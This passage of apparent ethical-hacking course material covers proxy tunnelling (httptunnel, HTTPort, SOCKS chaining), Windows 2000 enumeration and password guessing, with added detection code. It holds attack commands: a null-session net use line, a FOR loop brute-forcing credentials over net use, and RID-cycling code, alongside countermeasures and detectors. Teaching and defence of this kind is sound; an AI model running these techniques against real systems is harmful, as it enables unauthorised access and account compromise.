  --keep-alive SECONDS                  send keepalive bytes every SECONDS seconds
                                        (default is 5)
  --max-connection-age SEC              maximum time a connection will stay
                                        open is SEC seconds (default is 300)
  --proxy HOSTNAME[:PORT]               use a HTTP proxy (default port is 8080)
  --stdin-stdout                        use stdin/stdout for communication
                                        (implies --no-daemon)
  --strict-content-length               always write Content-Length bytes in requests
  --timeout TIME                        timeout, in milliseconds, before sending
                                        padding to a buffering proxy
  --user-agent STRING                   specify User-Agent value in HTTP requests
  --version                             output version information and exit
  --no-daemon                           don't fork into the background

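The defender's side of the httptunnel slide, as an added example that is not code from the courseware or from the httptunnel project. The help text above gives the two signals: the client pushes its outbound half as PUT requests of a fixed size (--content-length) and holds the inbound half open as a long-lived GET, with --keep-alive padding to keep a buffering proxy from timing out. A proxy log therefore shows one client repeatedly uploading identically sized bodies to one host and keeping GETs open far longer than a page fetch. The log layout and every line below are constructed; adapt parse() to the real access-log format of your proxy.

```python
"""Heuristic detection of HTTP-tunnelled connections (httptunnel / HTTPort
style) in outbound proxy logs.

Added example for this section, not code from the original courseware or from
the httptunnel project.  The log layout and every sample line are constructed
for illustration; adapt parse() to your proxy's real access-log format.
"""
from collections import defaultdict

# Constructed log.  Fields: epoch client method url content_length duration_ms user_agent
SAMPLE_LOG = """\
1050000000 10.0.0.5 GET http://www.example.com/index.html 0 120 Mozilla/4.0
1050000001 10.0.0.7 PUT http://203.0.113.9:8888/index.html 102400 60000 -
1050000002 10.0.0.7 PUT http://203.0.113.9:8888/index.html 102400 60000 -
1050000003 10.0.0.7 GET http://203.0.113.9:8888/index.html 0 300000 -
1050000004 10.0.0.7 PUT http://203.0.113.9:8888/index.html 102400 60000 -
1050000005 10.0.0.5 POST http://www.example.com/login 512 90 Mozilla/4.0
"""


def parse(line: str) -> dict:
    """Split one constructed log line into its fields."""
    ts, client, method, url, clen, dur, ua = line.split(" ", 6)
    host = url.split("/")[2]          # "http://host:port/path" -> "host:port"
    return {"ts": int(ts), "client": client, "method": method, "host": host,
            "clen": int(clen), "dur": int(dur), "ua": ua}


def tunnel_suspects(log_text: str, min_uploads: int = 3,
                    min_upload_bytes: int = 32768, long_ms: int = 30000) -> dict:
    """Flag (client, host) pairs whose traffic looks like a tunnel, not browsing.

    httptunnel sends the client-to-server half as a series of PUT requests of
    the same large Content-Length and keeps a GET open for the server-to-client
    half, so two cheap signals are: repeated uploads of identical size to one
    host, and GETs that stay open far longer than a page fetch.  Ordinary form
    POSTs vary in size and are small, so they pass.
    """
    uploads = defaultdict(list)
    long_gets = defaultdict(int)
    for line in log_text.splitlines():
        e = parse(line)
        key = (e["client"], e["host"])
        if e["method"] in ("PUT", "POST") and e["clen"] >= min_upload_bytes:
            uploads[key].append(e["clen"])
        if e["method"] == "GET" and e["dur"] >= long_ms:
            long_gets[key] += 1

    findings = {}
    for key, sizes in uploads.items():
        if len(sizes) >= min_uploads and len(set(sizes)) == 1:
            findings[key] = f"{len(sizes)} uploads of exactly {sizes[0]} bytes"
    for key, count in long_gets.items():
        if key not in findings:
            findings[key] = f"{count} long-lived GET(s)"
    return findings


if __name__ == "__main__":
    for (client, host), why in tunnel_suspects(SAMPLE_LOG).items():
        print(f"{client} -> {host}: {why}")
```

The thresholds are starting points, not truth: an attacker who sets --content-length to vary and --user-agent to mimic a browser defeats the size check, which is why the long-lived GET and the destination (a non-web host on an odd port) are worth correlating as well.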

HTTPort

(Screenshot: HTTPort 3.SNF main window. Tabs: System, Proxy, Port mapping, About, Register. On the Proxy tab: "HTTP proxy you need to bypass" with host name or IP address and port; proxy options with an Authorize check box and user name; other options with User-Agent "IE 6.0"; Bypass mode "Remote host", with an optional personal remote host (hostname or IP address, port, password; public hosts are used if left blank). On the Port mapping tab: "Static TCP/IP port mappings (tunnels)" listing sample mappings for Yahoo! POP3, an external HTTP proxy, the Microsoft news server, an IRC server, Microsoft Outlook POP3 and Microsoft Outlook SMTP, with per-mapping statistics ("No stats - inactive"); a "Built-in SOCKS4 server" box with "Run SOCKS server (port 1080)" and, available in Remote Host mode, "Full SOCKS4 support (BIND)".)

HTTPort allows you to bypass an HTTP proxy that is blocking you from the Internet. With HTTPort you may use the following software (just a sample list, not limited to it) from behind an HTTP proxy: e-mail, IRC, ICQ, news, FTP, AIM, any SOCKS-capable software, etc. The User-Agent setting makes the tunnel's requests look like a browser's in the proxy logs, and the built-in SOCKS4 server lets applications that have no port-mapping support of their own ride the same tunnel.

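The SOCKS4 exchange that both SocksChain and HTTPort's built-in SOCKS4 server speak, as an added example (not code from either product). It encodes and decodes the CONNECT request and its reply, and shows what "chaining" means on the wire: the client only ever talks SOCKS to the first proxy, and each CONNECT names the next hop, so only the last CONNECT carries the real destination. Addresses and the user ID are constructed for illustration.

```python
"""SOCKS4 CONNECT exchange and proxy chaining, as used by SocksChain and by
HTTPort's built-in SOCKS4 server.

Added example for these sections; not code from either product.  Addresses
and user IDs are constructed for illustration.
"""
import socket
import struct

SOCKS_VERSION = 4
CMD_CONNECT = 1
REPLY_VERSION = 0            # replies always carry VN=0
REPLY_GRANTED = 0x5A
REPLY_REJECTED = 0x5B


def build_connect(dst_ip: str, dst_port: int, userid: str = "") -> bytes:
    """Client -> proxy: VN=4, CD=1, DSTPORT (2 bytes BE), DSTIP (4 bytes), USERID, NUL."""
    return (struct.pack("!BBH", SOCKS_VERSION, CMD_CONNECT, dst_port)
            + socket.inet_aton(dst_ip)
            + userid.encode("ascii") + b"\x00")


def parse_connect(data: bytes):
    """Proxy side: decode a CONNECT and return (dst_ip, dst_port, userid)."""
    if len(data) < 9:
        raise ValueError("truncated SOCKS4 request")
    vn, cd, port = struct.unpack("!BBH", data[:4])
    if vn != SOCKS_VERSION or cd != CMD_CONNECT:
        raise ValueError("not a SOCKS4 CONNECT")
    userid, nul, _rest = data[8:].partition(b"\x00")
    if not nul:
        raise ValueError("USERID is not NUL-terminated")
    return socket.inet_ntoa(data[4:8]), port, userid.decode("ascii")


def build_reply(granted: bool) -> bytes:
    """Proxy -> client: VN=0, CD=0x5A (granted) or 0x5B (rejected), then 6 ignored bytes."""
    return struct.pack("!BBH4s", REPLY_VERSION,
                       REPLY_GRANTED if granted else REPLY_REJECTED, 0, b"\x00" * 4)


def reply_granted(data: bytes) -> bool:
    if len(data) != 8 or data[0] != REPLY_VERSION:
        raise ValueError("malformed SOCKS4 reply")
    return data[1] == REPLY_GRANTED


def chain_requests(proxies, target_ip: str, target_port: int, userid: str = "anon"):
    """CONNECT requests to issue, in order, to tunnel through a chain of proxies.

    The client speaks SOCKS4 only to the first proxy.  Each CONNECT names the
    *next* hop, so proxy N learns only about proxy N+1 (and about the hop that
    connected to it); only the last CONNECT names the real target.  The list
    has one request per proxy.
    """
    hops = list(proxies[1:]) + [(target_ip, target_port)]
    return [build_connect(ip, port, userid) for ip, port in hops]


if __name__ == "__main__":
    chain = [("198.51.100.10", 1080), ("198.51.100.20", 1080), ("203.0.113.30", 1080)]
    for i, req in enumerate(chain_requests(chain, "192.0.2.80", 80), start=1):
        print(f"hop {i} receives CONNECT to {parse_connect(req)[:2]}")
```

Note what the USERID field is and is not: SOCKS4 carries it in clear text and the proxy may log it, but there is no password, so an open SOCKS4 server (the HTTPort default listens on 1080) is usable by anyone who can reach the port.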
Summary

• War dialing is the term given to dialing through a block of phone numbers to find modems that answer, and using a poorly protected one to get into a network. Popular tools include THC-Scan and PhoneSweep.
• Scanning is a method adopted by administrators and crackers alike to discover more about a network.
• There are various scan types: SYN, FIN, Connect, ACK, RPC, Inverse Mapping, FTP Bounce, Idle Host etc. The use of a particular scan type depends on the objective at hand.
• Ways to subvert a standard connection include HTTPort, HTTP tunneling, using proxies, SOCKS chains and anonymizers.

Ethical Hacking

Module IV
Enumeration

Module Objective

• Understanding Windows 2000 enumeration
• How to connect via null session
• How to perform NetBIOS enumeration
• SNMP enumeration
• How to steal Windows 2000 DNS information using zone transfers
• Learn to enumerate users via CIFS/SMB
• Active Directory enumeration

• If target acquisition and non-intrusive probing have not turned up any results, an attacker will next turn to identifying valid user accounts or poorly protected resource shares.
• Enumeration involves active connections to systems and directed queries. Unlike footprinting and most scanning it is therefore logged by the target and is more likely to be noticed.
• The type of information enumerated by intruders:
  • Network resources and shares
  • Users and groups
  • Applications and banners

NetBIOS Null Sessions

• The null session is often referred to as the Holy Grail of Windows hacking. Null sessions take advantage of flaws in CIFS/SMB (Common Internet File System / Server Message Block).
• You can establish a null session with a Windows (NT/2000/XP) host by logging on with a null user name and password.
• Using these null connections allows you to gather the following information from the host:
  • List of users and groups
  • List of machines
  • List of shares
  • Users and host SIDs (Security Identifiers)

• Anyone with a NetBIOS connection to your computer can easily get a full dump of all your user names, groups, shares, permissions, policies, services and more using the null user.

C:\>net use \\192.34.34.2\IPC$ "" /u:""

• The above syntax connects to the hidden Inter Process Communication 'share' (IPC$) at IP address 192.34.34.2 as the built-in anonymous user (/u:"") with a null ("") password.
• The attacker now has a channel over which to attempt various techniques.
• The CIFS/SMB and NetBIOS standards in Windows 2000 include APIs that return rich information about a machine via TCP port 139 (and via TCP 445 for direct SMB over TCP), even to unauthenticated users.


Null Session Countermeasures

• Null sessions require access to TCP ports 139 and/or 445; filter them at the network border and on hosts that do not need to serve files.
• You could also disable SMB services entirely on individual hosts by unbinding WINS Client (TCP/IP) from the interface.
• Edit the registry to restrict the anonymous user:
  1. Open regedt32 and navigate to HKLM\SYSTEM\CurrentControlSet\Control\Lsa
  2. Choose Edit | Add Value
     • Value name: RestrictAnonymous
     • Data type: REG_DWORD
     • Value: 2
• Value 2 is only honoured on Windows 2000 and later; NT 4.0 understands only 0 and 1, and several of the tools later in this module still work against a setting of 1.

NetBIOS Enumeration

• NBTscan is a program for scanning IP networks for NetBIOS name information.
• For each host that responds it lists the IP address, NetBIOS computer name, logged-in user name and MAC address.
• The first thing a remote attacker will try on a Windows 2000 network is to get a list of hosts attached to the wire:
  1. net view /domain
  2. nbtstat -A <some IP>

C:\WINNT\System32\cmd.exe

Doing NBT name scan for addresses from 192.168.2.0/24

Sendto failed: Cannot assign requested address   192.168.2.0
Recvfrom failed: Connection reset by peer        192.168.2.1

NetBIOS Name Table for Host 192.168.2.4:
  USER           Workstation Service
  WORKGROUP      Domain Name
  USER           Messenger Service
  Adapter address: (illegible in screenshot)

NetBIOS Name Table for Host 192.168.2.7:
  JCITR02        Workstation Service
  RANGE2         Domain Name
  JCITR02        Messenger Service
  JCITR02        File Server Service
  RANGE2         Browser Service Elections
  RANGE2         Master Browser
  __MSBROWSE__   Master Browser

NetBIOS Name Table for Host 192.168.2.24:
  COMPUTRE1      Workstation Service
  COMPUTRE1      Messenger Service
  Adapter address: c1-26-10-d4-2d-...

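How nbtscan turns a raw name table into "computer name, domain, logged-in user, file server", as an added example (not code from the courseware or from nbtscan). Every NetBIOS name is registered with a one-byte suffix that identifies the service; the table below maps the standard suffixes, and the parser reduces an `nbtstat -A` style dump to the facts shown in the screenshot above. The sample table is constructed to resemble host 192.168.2.7, with a constructed MAC address and an added logged-on user entry.

```python
"""Interpret a NetBIOS name table (output of `nbtstat -A <ip>` or of nbtscan)
to extract what an attacker learns from it.

Added example for this section; not code from the courseware or from nbtscan.
The sample table is constructed to resemble the screenshot above, with a
constructed MAC address and an extra logged-on user entry.
"""
import re

# (suffix, type) -> service the name is registered for.  These are the standard
# NetBIOS name suffixes; nbtstat prints the suffix in angle brackets.
SUFFIXES = {
    (0x00, "UNIQUE"): "Workstation Service (computer name)",
    (0x00, "GROUP"):  "Domain or workgroup name",
    (0x01, "GROUP"):  "Master Browser (__MSBROWSE__)",
    (0x03, "UNIQUE"): "Messenger Service (computer name or logged-on user)",
    (0x1B, "UNIQUE"): "Domain Master Browser (normally the PDC)",
    (0x1C, "GROUP"):  "Domain Controllers",
    (0x1D, "UNIQUE"): "Master Browser for this subnet",
    (0x1E, "GROUP"):  "Browser Service Elections",
    (0x20, "UNIQUE"): "File Server Service (this host offers shares)",
}

SAMPLE_TABLE = """\
           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    JCITR02        <00>  UNIQUE      Registered
    RANGE2         <00>  GROUP       Registered
    JCITR02        <03>  UNIQUE      Registered
    JSMITH         <03>  UNIQUE      Registered
    JCITR02        <20>  UNIQUE      Registered
    RANGE2         <1E>  GROUP       Registered
    RANGE2         <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered

    MAC Address = 00-50-56-C0-00-08
"""

ENTRY = re.compile(r"^\s*(\S+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)", re.M)
MAC = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f-]{17})")


def parse_table(text: str):
    """Yield (name, suffix, type, meaning) for every registered name."""
    for name, suffix, kind in ENTRY.findall(text):
        suffix = int(suffix, 16)
        yield name, suffix, kind, SUFFIXES.get((suffix, kind), "unknown service")


def summarize(text: str) -> dict:
    """Reduce the table to the facts nbtscan reports per host."""
    entries = list(parse_table(text))
    host = next((n for n, s, k, _ in entries if s == 0x00 and k == "UNIQUE"), None)
    domain = next((n for n, s, k, _ in entries if s == 0x00 and k == "GROUP"), None)
    # A <03> name that is not the computer name is a user with a Messenger session.
    users = sorted({n for n, s, k, _ in entries if s == 0x03 and k == "UNIQUE" and n != host})
    mac = MAC.search(text)
    return {
        "host": host,
        "domain": domain,
        "users": users,
        "file_server": any(s == 0x20 for _, s, _, _ in entries),
        "master_browser": any(s == 0x1D for _, s, _, _ in entries),
        "mac": mac.group(1) if mac else None,
    }


if __name__ == "__main__":
    for name, suffix, kind, meaning in parse_table(SAMPLE_TABLE):
        print(f"{name:<16}<{suffix:02X}> {kind:<7} {meaning}")
    print(summarize(SAMPLE_TABLE))
```

The <20> entry is the one worth acting on: it says the host runs the Server service and therefore has shares to enumerate, while a <1B> or <1C> entry marks a domain controller, the host whose SAM is worth the most.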
Hacking Tool: DumpSec

DumpSec reveals shares over a null session with the target computer. It can also dump users, groups, permissions and policies. In the screenshot below the policy report is partly refused: rc=5 is ERROR_ACCESS_DENIED, which is what a null session gets once anonymous access to that information has been restricted.

(Screenshot: DumpSec, Report menu, "Policies" report)
  ==>rc=5 NetUserModalsGet(0)
  ==>rc=5 NetUserModalsGet(3)
  ==>Not authorized to view remaining policy information
  Replication
  ==>rc=5 OpenSCManager
  System Path Components (in search order)
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers (key not present)

Hacking Tool: NAT

• The NetBIOS Auditing Tool (NAT) is designed to explore the NetBIOS file-sharing services offered by the target system.
• It implements a stepwise approach to gather information and attempt to obtain file-system-level access as though it were a legitimate local client.
• If a NetBIOS session can be established at all via TCP port 139, the target is declared "vulnerable".
• Once the session is fully set up, transactions are performed to collect more information about the server, including any file system "shares" it offers.

SNMP Enumeration

• SNMP is simple. Managers send requests to agents, and the agents send back replies.
• The requests and replies refer to variables accessible to agent software.
• Managers can also send requests to set values for certain variables.
• Traps let the manager know that something significant has happened at the agent's end of things:
  • a reboot
  • an interface failure
  • or that something else that is potentially bad has happened.
• Enumerating NT users via SNMP is easy using snmputil, because SNMPv1/v2c authenticates with nothing more than a community string sent in clear text, and the read community is very often left at its default of "public".

SNMPutil example

C:\WINNT\System32\cmd.exe

C:\>snmputil get 210.212.69.129 public .1.3.6.1.2.1.1.2.0
Variable = system.sysObjectID.0
Value    = ObjectID 1.3.6.1.4.1.9.1.27

C:\>snmputil getnext 210.212.69.129 public interfaces.ifNumber.0
Variable = interfaces.ifTable.ifEntry.ifIndex.1
Value    = Integer32 1

C:\>snmputil getnext 210.212.69.129 public interfaces.ifTable.ifEntry.ifIndex.1
Variable = interfaces.ifTable.ifEntry.ifIndex.2
Value    = Integer32 2

C:\>snmputil getnext 210.212.69.129 public interfaces.ifTable.ifEntry.ifIndex.2
Variable = interfaces.ifTable.ifEntry.ifIndex.3
Value    = Integer32 3

C:\>snmputil getnext 210.212.69.129 public .0.0
Variable = system.sysDescr.0
Value    = String <0x43><0x69><0x73><0x63><0x6f><0x20><0x49><0x6e><0x74><0x65><0x72><0x6e><0x65>
<0x74><0x77><0x6f><0x72><0x6b><0x20><0x4f><0x70><0x65><0x72><0x61><0x74><0x69>
<0x6e><0x67><0x20><0x53><0x79><0x73><0x74><0x65><0x6d><0x20><0x53><0x6f><0x66>
<0x74><0x77><0x61><0x72><0x65><0x20><0x0d><0x0a><0x49><0x4f><0x53><0x20><0x28>
<0x74><0x6d><0x29><0x20><0x32><0x35><0x30><0x30><0x20><0x53><0x6f><0x66><0x74>
<0x77><0x61><0x72><0x65><0x20><0x28><0x43><0x32><0x35><0x30><0x30><0x2d><0x49>
<0x2d><0x4c><0x29><0x2c><0x20><0x56><0x65><0x72><0x73><0x69><0x6f><0x6e><0x20>
<0x31><0x31><0x2e><0x32><0x28><0x31><0x30><0x61><0x29><0x2c><0x20><0x52><0x45>
<0x4c><0x45><0x41><0x53><0x45><0x20><0x53><0x4f><0x46><0x54><0x57><0x41><0x52>
<0x45><0x20><0x28><0x66><0x63><0x31><0x29><0x0d><0x0a><0x43><0x6f><0x70><0x79>
<0x72><0x69><0x67><0x68><0x74><0x20><0x28><0x63><0x29><0x20><0x31><0x39><0x38>
<0x36><0x2d><0x31><0x39><0x39><0x37><0x20><0x62><0x79><0x20><0x63><0x69><0x73>
<0x63><0x6f><0x20><0x53><0x79><0x73><0x74><0x65><0x6d><0x73><0x2c><0x20><0x49>
<0x6e><0x63><0x2e><0x0d><0x0a><0x43><0x6f><0x6d><0x70><0x69><0x6c><0x65><0x64>
<0x20><0x54><0x75><0x65><0x20><0x30><0x32><0x2d><0x44><0x65><0x63><0x2d><0x39>
<0x37><0x20><0x31><0x36><0x3a><0x30><0x32><0x20><0x62><0x79><0x20><0x63><0x6b>
<0x72><0x61><0x6c><0x69><0x6b>

IP Network Browser [210.212.69.129]

(Screenshot: SolarWinds IP Network Browser, subnet scan of 210.212.69.129 (a vsnl.net.in host) with community string "public", identifying the device as a Cisco 2511 and walking its system group and interfaces: Description "Cisco Internetwork Operating System Software IOS (tm) 2500 Software (C2500-I-L), Version ..."; Contact and Location empty; sysObjectID 1.3.6.1.4.1.9...; Last Boot 20-May-03 2:33:13 PM; Router (will forward IP packets): Yes; 19 interfaces, Ethernet0 being ethernetCsmacd, MTU 1500, speed 10 Mbps, admin status enabled, operational status up, last change 21-Jun-03 2:43:03 PM (Keepalive); performance snapshot 21-Jun-03 3:52:56 PM with input 267 Kbits/sec and 77 pkts/sec, output 323 Kbits/sec and 211 pkts/sec; TCP/IP address 202.54.30.37 with mask 255.255.255.192; status line "Subnet Scan Completed".)

Everything in this window was obtained without credentials: the read community string alone exposes the IOS version (and therefore the applicable exploits), every interface and every address the router has.

SNMP Enumeration Countermeasures

• The simplest way to prevent such activity is to remove the SNMP agent or turn off the SNMP service.
• If shutting off SNMP is not an option, then change the default 'public' community name and filter UDP port 161 so that only the management stations can reach the agent. The community string still travels in clear text, so a sniffer on the path learns it anyway.
• Implement the Group Policy security option called "Additional restrictions for anonymous connections".
• Access to null session pipes and null session shares should also be restricted, and IPSec filtering applied.

Windows 2000 DNS Zone Transfer

• For clients to locate Windows 2000 domain services such as AD and Kerberos, Windows 2000 relies on DNS SRV records.
• A simple zone transfer (nslookup, then ls -d <domainname> at the nslookup prompt) can enumerate a lot of interesting network information if the DNS server allows transfers to arbitrary hosts.
• An attacker would look at the following records closely:
  1. Global Catalog service (_gc._tcp)
  2. Domain Controllers (_ldap._tcp)
  3. Kerberos authentication (_kerberos._tcp)

Blocking Windows 2000 Zone Transfers

You can easily block zone transfers using the DNS property sheet (the Zone Transfers tab of the zone's properties) as shown here, either by disallowing transfers entirely or by allowing them only to the servers listed on the Name Servers tab.

Identifying Accounts

• Two powerful NT/2000 enumeration tools are:
  1. sid2user
  2. user2sid
• They can be downloaded from www.chem.msu.su/~rudnyi/NT/
• These are command-line tools that look up NT SIDs from user-name input and vice versa. Because the RID of a built-in account never changes (Administrator is always 500), they find the real administrator even if it has been renamed, and walking RIDs upward from 1000 lists every account created since the system was installed.

C:\WINNT\System32\cmd.exe

D:\Module 4 - Enumeration\sid>user2sid \\196... administrator

S-1-5-21-1123561945-1788223648-725345543-500

Number of subauthorities is 5
Domain is ETRUSTFIREWALL
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser

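What user2sid and sid2user are working with, as an added example (not code from the courseware or from the tools): the SID's domain part and RID are split, the binary layout is reproduced (which is why the screenshot reports 28 bytes for a SID with 5 sub-authorities), well-known RIDs are named, and the list of SIDs an attacker would feed to sid2user one by one is generated. The SID is the one shown above; any account names would come from the target, not from this code.

```python
"""Windows SID handling in the spirit of user2sid / sid2user.

Added example for this section; not code from the courseware or from the
tools.  The SID is the one in the screenshot above; the RID table lists the
well-known RIDs that Windows assigns, and the account names resolved from
rid_cycle() would come from the target, not from this file.
"""
import struct

WELL_KNOWN_RIDS = {
    500: "Administrator", 501: "Guest", 502: "krbtgt",
    512: "Domain Admins", 513: "Domain Users", 514: "Domain Guests",
    515: "Domain Computers", 516: "Domain Controllers",
}


def split_sid(sid: str):
    """'S-1-5-21-a-b-c-500' -> ('S-1-5-21-a-b-c', 500): the domain part and the RID."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 4:
        raise ValueError(f"not a SID: {sid!r}")
    return "-".join(parts[:-1]), int(parts[-1])


def sid_to_bytes(sid: str) -> bytes:
    """Binary layout: revision (1), sub-authority count (1), 48-bit identifier
    authority (big-endian), then each sub-authority as a little-endian uint32."""
    parts = sid.split("-")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def describe_rid(rid: int) -> str:
    if rid in WELL_KNOWN_RIDS:
        return f"well-known: {WELL_KNOWN_RIDS[rid]}"
    if rid >= 1000:
        return "user-created account or group"
    return "built-in / reserved"


def rid_cycle(domain_sid: str, start: int = 1000, count: int = 50):
    """SIDs to hand to sid2user one by one: user-created accounts get RIDs from
    1000 upward, so walking RIDs enumerates accounts without any user list."""
    return [f"{domain_sid}-{rid}" for rid in range(start, start + count)]


if __name__ == "__main__":
    sid = "S-1-5-21-1123561945-1788223648-725345543-500"
    domain, rid = split_sid(sid)
    print(domain, rid, describe_rid(rid), len(sid_to_bytes(sid)), "bytes")
```

Only one known name is needed to start: user2sid on any account (Guest, or a name seen in the NetBIOS table) yields the domain SID, after which sid2user on domain-SID-500 names the administrator whatever it has been renamed to.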
Hacking Tool: Enum

• Available for download from http://razor.bindview.com
• enum is a console-based Win32 information enumeration utility.
• Using null sessions, enum can retrieve user lists, machine lists, share lists, name lists, group and membership lists, and password and LSA policy information.
• enum is also capable of a rudimentary brute-force dictionary attack on individual accounts.

Hacking Tool: Userinfo

• Userinfo is a little utility that retrieves all available information about any known user from any NT/Win2k system that you can reach on TCP port 139.
• Specifically, by calling the NetUserGetInfo API at level 3, Userinfo returns standard information such as:
  • SID and primary group
  • logon restrictions and smart card requirements
  • special group information
  • password expiration information and password age
• This application works as a null user, even if RestrictAnonymous is set to 1 to specifically deny anonymous enumeration. It needs a user name to start from, and on Windows 2000 a RestrictAnonymous value of 2 removes the anonymous user's access altogether.

Hacking Tool: GetAcct

• GetAcct sidesteps "RestrictAnonymous=1" and acquires account information on Windows NT/2000 machines.
• Downloadable from www.securityfriday.com

(Screenshot: GetAcct window, "Get Account", Domain/Computer Name FUTURE. The result grid has the columns User name, Full name, Comment, User comment, Password age, Priv, Primary group, Op flags and Account type, and lists the built-in Administrator and Guest accounts (with their "Built-in account" comments) and a user-created account "jayesh" with RID 1000; password ages are shown in days.)

Active Directory Enumeration

• All the existing users and groups can be enumerated with a simple LDAP query.
• The only thing required to perform this enumeration is to create an authenticated session via LDAP.
• Connect to any AD server using ldp.exe on port 389.
• Authenticate yourself using Guest or any domain account.
• Now all the users and built-in groups can be enumerated.

AD Enumeration Countermeasures

• How is this possible with a simple guest account?
• The Windows 2000 dcpromo installation screen prompts whether the user wants to relax access permissions on the directory to allow legacy (pre-Windows 2000) servers to perform lookups:
  1. Permissions compatible with pre-Windows 2000 servers
  2. Permissions compatible only with Windows 2000 servers
• Choose option 2 during AD installation. Option 1 puts Everyone into the Pre-Windows 2000 Compatible Access group, which has read access to user and group attributes, and in Windows 2000 Everyone includes anonymous logons; removing Everyone from that group afterwards has the same effect as choosing option 2.

Summary

• Enumeration involves active connections to systems and directed queries.
• The type of information enumerated by intruders includes network resources and shares, users and groups, and applications and banners.
• Null sessions are often used by crackers to connect to target systems.
• NetBIOS and SNMP enumeration can be carried out using tools such as nbtscan, snmputil, NAT etc.
• Tools such as user2sid, sid2user and userinfo can be used to identify vulnerable user accounts.

Ethical Hacking

Module V
System Hacking

Module Objective

• Understand the following:
  • Remote password guessing
  • Eavesdropping
  • Denial of Service
  • Buffer overflows
  • Privilege escalation
  • Password cracking
  • Keystroke loggers
  • Sniffers
  • Remote control and backdoors
  • Port redirection
  • Covering tracks
  • Hiding files

Administrator Password Guessing

• Assuming that the NetBIOS TCP port 139 is open, the most effective method of breaking into NT/2000 is password guessing.
• This means attempting to connect to an enumerated share (IPC$ or C$) and trying user name / password combinations.
• The default Admin$, C$ and %SystemDrive% shares are a good starting point. The Administrator account is the obvious target because, by default, it cannot be locked out by failed attempts.

Performing Automated Password Guessing

• Performing automated password guessing is easy: a simple loop using the NT/2000 command shell, based on the standard NET USE syntax.
  1. Create a simple user-name and password file.
  2. Pipe this file into the FOR command:

C:\>FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\target\IPC$ %i /u:%j

• With "tokens=1,2*", %i receives the first column of each line and %j the second, and net use takes the password before /u:, so the file must list the password first and the user name second, one pair per line. The screenshot shows a file of this shape:

  password   username
  password   administrator
  xycdf      john
  babe_me    rebecca
  freak_you  Rumsfield

• Each net use attempt is a full SMB logon and appears in the target's Security log as event 529 when it fails. Once a pair succeeds, later attempts against the same server fail with error 1219 (multiple connections to a server) until the session is removed with net use \\target\IPC$ /delete.

Tool: Legion

(Screenshot: Legion v2.1 window. Scan Type: Scan Range or Scan List; Scan Range with "Enter Start IP" / "Enter End IP"; buttons Scan, Abort Scan, Clear, Show BF Tool, Map Drive and Save Text. Result: "13 shares found on 4 remote hosts", 192.168.20.8, 192.168.20.102, 192.168.20.144 and 192.168.20.170, listed as:
  \\192.168.20.8\SharedDocs
  \\192.168.20.102\SharedDocs
  \\192.168.20.144\SharedDocs
  \\192.168.20.170\CD Drive (G)
  \\192.168.20.170\SharedDocs
  \\192.168.20.170\C
  \\192.168.20.170\D
  \\192.168.20.170\usadata0
  \\192.168.20.170\usadata1
  \\192.168.20.170\usa_db
  \\192.168.20.170\E
  \\192.168.20.170\F
  \\192.168.20.170\usa)

• Legion automates password guessing in NetBIOS sessions. Legion will scan multiple Class C IP address ranges for Windows shares and also offers a manual dictionary attack tool (the "BF Tool").

Hacking Tool: NTInfoScan (now CIS)

(Screenshot 1: Cerberus Internet Scanner results for \\192.168.20.102, opened in Internet Explorer from C:\downloads\cerebus\Reports\192.168.20.102.html. Report sections: Web Service, MS SQL Service, FTP Service, NetBIOS, NT Registry, NT Services, SMTP Service, POP3 Service, Portmapper, Finger, System Details. Two of the registry findings read:

  Remote Access to the Registry
  Key: HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers
  The winreg key does not exist. The ACLs set on this key control who has network access to the registry. Create this key and give administrators full control. This will ensure that only administrators have network access to the registry.

  Key: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
  Value: AutoShareServer
  The automatic administrative shares (C$, D$, ADMIN$, etc.) are still created on this machine. Add this key and set the value to 0 to stop this.

Screenshot 2: the scanner itself, "Host to Scan: 192.168.20.107", running its checks in order: web service, SQL service, ftp service, NetBIOS, NT Registry, NT Service, smtp service, POP3 service, RPC, finger, DNS and Browser checks, each reported as completed.)

• NTInfoScan, a security scanner for NT 4.0, is a vulnerability scanner that produces an HTML-based report of the security issues found on the target system, with further information on each.

Password Guessing Countermeasures

• Block access to TCP and UDP ports 135-139 (and TCP 445 on Windows 2000) at the network border.
• Disable bindings to WINS Client (TCP/IP) on any adapter that does not need to serve files.
• Use complex passwords and an account lockout policy; enable lockout for the built-in Administrator with the Resource Kit's passprop /adminlockout, since that account is otherwise exempt.
• Audit logon events and review the Security log in Event Viewer: event 529 is a failed logon (unknown user name or bad password) and event 539 is an account locked out, both in the Logon/Logoff category.

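What the last countermeasure looks like once it is automated, as an added example (not code from the courseware or from any Microsoft or Foundstone tool): the automated NET USE loop from the previous slides produces a burst of 529 events from one source workstation, ending in a 539 if lockout is on, and a detector that counts failures per source inside a time window separates that burst from the single typo a real user makes. The events are constructed, reduced to the four fields the detector needs.

```python
"""Spot password guessing in NT/2000 Security-log failures (event 529: bad user
name or password; event 539: account locked out).

Added example for this section; not code from the courseware or from any
Microsoft or Foundstone tool.  The events are constructed, with the field
layout reduced to what the detector needs.
"""
from collections import defaultdict
from datetime import datetime, timedelta

FAILURE_EVENTS = {529: "bad user name or password", 539: "account locked out"}

# Constructed events: (time, event id, target user, source workstation)
SAMPLE_EVENTS = [
    ("2003-06-21 09:00:01", 529, "administrator", "\\\\PEGASUS"),
    ("2003-06-21 09:00:03", 529, "administrator", "\\\\PEGASUS"),
    ("2003-06-21 09:00:05", 529, "administrator", "\\\\PEGASUS"),
    ("2003-06-21 09:00:08", 529, "administrator", "\\\\PEGASUS"),
    ("2003-06-21 09:00:10", 529, "administrator", "\\\\PEGASUS"),
    ("2003-06-21 09:00:12", 529, "administrator", "\\\\PEGASUS"),
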